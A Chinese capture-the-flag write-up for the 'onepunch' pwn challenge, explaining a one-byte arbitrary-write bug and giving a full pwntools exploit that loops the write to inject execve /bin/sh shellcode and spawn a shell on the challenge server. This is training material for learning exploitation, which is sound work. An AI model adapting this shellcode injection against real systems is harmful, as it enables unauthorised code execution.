- 1kafka rebalance与数据重复消费问题_you can address this either by increasing max.poll
- 2RELU6
- 3深度学习神经网络实战:多层感知机,手写数字识别
- 4基于JavaEE人力资源管理系统_javaee资源管理
- 5【Python 爬虫】简单的网页爬虫_对网页进行爬虫操作csdn
- 6网康科技-下一代防火墙 rce_网康下一代防火墙 命令执行批量rce
- 7linux中$?,$#等代表什么_-,#_¥)
- 8运行npm报错:npm ERR! errno ETIMEDOUTnpm ERR! network request to https://registry.npm的解决方案
- 9Flutter 时间选择组件_flutter筛选组件
- 10JavaEE程序员必读图书大推
onepunch的wp_pwn题 one_punch_man题解
赞
踩
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了onepunch这个题目感觉还不错,我把wp分享出来,方便大家学习
onepunch的题目要求是:
nc hackme.inndy.tw 7718
Punch!- 1
- 2
- 3
这个题目没有太多提示
下面我用ida打开smashthestack这个程序看main函数
这个程序在16行有一个任意地址写的漏洞,程序输入的第一个数字是写入的地址,第二个数字是写入的数,但是这个程序只能写一个字节的数据到指定地址
先运行一下程序看一下这个程序干了啥
再看看程序开启了哪些保护:
看到NX enabled是开启了栈不可执行,而且这个程序还有canary保护,但是这个程序没有开启地址随机化
用gdb加载一下这个程序
用vmmap这个指令可以看到代码段可读写,这个题目一下子就简单了,通过任意地址的写,把shellcode写入内存中,然后执行起来,先看一下汇编代码
可以看到在任意地址写这个漏洞之后有个条件跳转(0000000000400767),可以控制这个跳转向上跳转到输入的地方(000000000040072C)从而使这段代码变成一个循环,可以看一下jz short loc_400756对应的字节码是75 0a,75是jnz,0a是跳转的偏移,所以就刚刚好通过第一次写操作把这个0a改掉,所以程序开始时输入400768 -61就可以让这个程序变成一个循环了
这样通过这个循环把0000000000400769后面的代码变成shellcode就可以了,关于shellcode,里面不能出现255,如果有255的话,shellcode就会被程序截断,我找了半天,找到一个好用的shellcode:https://www.exploit-db.com/exploits/36858/
这样就可以实现exp了:
#-*- coding: utf-8 -*-
__Auther__ = 'niexinming'
from pwn import *
import binascii
import time
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'amd64', os = 'linux', log_level = 'debug')
def debug(addr = '0x000000000040075d'):
raw_input('debug:')
gdb.attach(io, "b *" + addr)
elf = ELF('/home/h11p/hackme/onepunch')
stack_chk_fail=elf.got['__stack_chk_fail']
print "%x" % stack_chk_fail
#shellcode=asm(shellcraft.amd64.linux.sh())
#str_shellcode=str(binascii.b2a_hex(shellcode))
#https://www.exploit-db.com/exploits/36858/
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
addr=0x0400769
#io = process('/home/h11p/hackme/onepunch')
io = remote('hackme.inndy.tw', 7718)
payload1 = '400768'
payload2 = '-61'
#debug()
time.sleep(1)
io.recvuntil('Where What?')
io.sendline(payload1)
io.sendline(payload2)
'''
for i in xrange(0,len(str_shellcode),2):
io.sendline(hex(addr))
io.sendline(str(int(str_shellcode[i:i+2],16)))
addr=addr+0x1
'''
for i in shellcode:
io.sendline(hex(addr))
io.sendline(str(ord(i)))
addr = addr + 0x1
io.sendline('4006f3')
io.sendline(str(255))
#io.recv()
io.interactive()
io.close()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
效果是:
